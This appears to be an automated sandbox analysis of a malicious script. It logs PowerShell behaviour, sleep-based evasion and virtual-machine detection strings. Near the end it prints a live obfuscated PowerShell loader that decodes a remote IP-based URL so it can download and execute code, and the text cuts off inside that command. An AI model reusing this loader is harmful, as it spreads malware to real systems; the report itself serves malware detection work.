          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3624Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6231Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7844Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1766Jump to behavior
          Source: C:\Windows\System32\wscript.exe TID: 7876Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5916Thread sleep time: -6456360425798339s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2276Thread sleep time: -5534023222112862s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BStopped vmicshutdown Hyper-V Guest Shutdown Service
          Source: wscript.exe, 00000000.00000003.1271680523.000001D5A7B2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BStopped vmicheartbeat Hyper-V Heartbeat Service
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BStopped vmicvmsession Hyper-V PowerShell Direct Service
          Source: powershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q$Hyper-V Volume Shadow Copy Requestor
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &Hyper-V Remote Desktop Virtualizati...
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BStopped vmicrdv Hyper-V Remote Desktop Virtualizati...
          Source: wscript.exe, 00000000.00000003.1271596131.000001D5A7A68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1262046725.000001D5A7A68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1270688935.000001D5A7A44000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1265664478.000001D5A7A44000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1274950930.000001D5A7A68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1266783931.000001D5A7A68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1260517825.000001D5A7A44000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1274759946.000001D5A7A44000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1260425360.000001D5A7A68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1262046725.000001D5A7A44000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1261264984.000001D5A7A68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: powershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q!Hyper-V PowerShell Direct Service
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BStopped vmicguestinterface Hyper-V Guest Service Interface
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #Hyper-V Remote Desktop Virtualizati
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &Hyper-V Guest Shutdown Service
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &Hyper-V Guest Service Interface
          Source: powershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q-Hyper-V Remote Desktop Virtualization Service
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A5B83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1357902050.000001D1A4B49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
          Source: wscript.exe, 00000000.00000003.1271337918.000001D5A5C0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1273952548.000001D5A5C0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1266659730.000001D5A5C1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &Hyper-V Heartbeat Service
          Source: wscript.exe, 00000000.00000002.1275119812.000001D5A7B30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A5B83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1357902050.000001D1A4B49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
          Source: powershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &Hyper-V PowerShell Direct Service
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &Hyper-V Data Exchange Service
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A5B83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1357902050.000001D1A4B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Hyper-V Time Synchronization Service
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A5B83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1357902050.000001D1A4B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Hyper-V Volume Shadow Copy Requestor
          Source: powershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
          Source: powershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q$Hyper-V Time Synchronization Service
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BStopped vmictimesync Hyper-V Time Synchronization Service
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Stopped vmicvss
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A5B83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1357902050.000001D1A4B49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A5B83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1357902050.000001D1A4B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !Hyper-V PowerShell Direct Service
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BStopped vmicvss Hyper-V Volume Shadow Copy Requestor
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BStopped vmickvpexchange Hyper-V Data Exchange Service
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &Hyper-V Volume Shadow Copy Requestor
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A5B83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1357902050.000001D1A4B49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A5B83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1357902050.000001D1A4B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -Hyper-V Remote Desktop Virtualization Service
          Source: powershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
          Source: powershell.exe, 00000005.00000002.1357902050.000001D1A6583000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &Hyper-V Time Synchronization Service
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Yara detected Powershell download and execute
          Source: Yara matchFile source: amsi64_8104.amsi.csv, type: OTHER
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8104, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1040, type: MEMORYSTR
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Thickskulled='func';Get-History;$Thickskulled+='t';Get-History;$Thickskulled+='i';$Hyldebusk=Get-History;$Thickskulled+='on:';(ni -p $Thickskulled -n Centralkomites -value { param($Toenderne);$Udlaansafdelingerne=5;do {$Hypersonically78+=$Toenderne[$Udlaansafdelingerne];$Udlaansafdelingerne+=6} until(!$Toenderne[$Udlaansafdelingerne])$Hypersonically78});ConvertTo-Html;(ni -p $Thickskulled -n Desiodothyroxine3 -value {param($Yodhs);.($Likrer) ($Yodhs)});ConvertTo-Html;$Protozoal=Centralkomites 'UdhunNAandseH lvfTKnowi.Sygehw';$Protozoal+=Centralkomites 'Tra.pe Ng eBGee.scStannl espIWeekeESkrumNOve,ft';$Affaldsbehandlingssystem=Centralkomites 'StensM SuitoTapwozPlatfividerlRooinl kogla Galm/';$Humps=Centralkomites 'Unt,rT b ralShowes ksko1I ter2';$Personnummers='Natur[ Mor.NPaa eEMondoTEll c.AudiosSuperEDirkeRTilkmvKorreiAl efcPyramEBrrespApproOAssorIu visNWhi ktIntegm per aGrievn ddanAfortrGFremhEFren rSoutf]Hellb: Hove: ensesEngulER.novcS wdeU PostrAcadeIElytrTAvedrySoejlpPardyRCodeboBassiTDeteko Fermc Utm.Ou derl Un,e=Gener$UnencHUdkraU ponsmAbeskpCheaps';$Affaldsbehandlingssystem+=Centralkomites 'Re.ym5 Me e. Re a0Civil Basha(,idsnWFjorti umlinA prodKilesoM.gilwIllegsGonad ParaNFaculTR sle B try1 Tita0 Neut.Restr0Umora;Disv Wan lWStimuiHjertnUnte 6Medbo4Mudst;Udsty Keciax bill6 ava4wicki;Lagri hawmrHunchvCbest:ifrer1ingse3Nasio4S,ema.udla 0Tabli)unalc RevolGFaaf eEquipcQuin,kSphaeo Gru / Cram2 Husa0 U.ya1 Week0T old0Herm.1Blast0Milli1Therm FortjFDuffaiLbeilrEberteHarmlf,sychoTrigoxchemo/Bihen1Ba.al3Fo pa4binar. etst0';$Transculturation=Centralkomites 'Skinnu SkilSUningeFo.terLavem-c eatATrochG nrulE EkstnUdartT';$Briggsk116=Centralkomites ' DischSaigat L.tttBundfpAnhe :Absfa/ Flaa/Dr ve6Sconc8 Eva..k bel1 arss6No pa8Marab.Raa e2P,ove2Musee3 Skam.Adiap1 Gyno0Dv gb8U rep/ ShelJUdlovDL the/CobalGJ ngaoDrewrsStealsVe.daiRibonpKorpseProgrrBobecsHansa.Reopetam 